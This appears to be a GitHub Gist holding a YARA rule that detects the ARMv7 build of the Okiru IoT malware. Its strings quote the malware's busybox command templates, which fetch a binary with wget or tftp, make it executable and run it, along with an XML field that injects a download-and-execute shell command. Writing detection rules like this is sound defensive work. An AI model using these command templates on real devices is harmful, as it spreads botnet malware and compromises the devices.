Last active
December 12, 2017 10:49
-
-
Save azurda/2e69bd278f98fd98df3baf687b02a91c to your computer and use it in GitHub Desktop.
Ruleset to detect the Okiru IoT malware based on the ARMv7 version found.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule Okiru : arm7 { | |
meta: | |
date = "11.12.2017" | |
description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found." | |
strings: | |
$busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s" | |
$busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s" | |
$busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s" | |
$busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s" | |
$busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'" | |
// $busy_6 = "/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'" | |
$xml = "<NewStatusURL>$(/bin/busybox wget -g %d.%d.%d.%d -l /tmp/.f -r /b; sh /tmp/.f)</NewStatusURL>" | |
condition: | |
3 of ($busy_*) and $xml | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment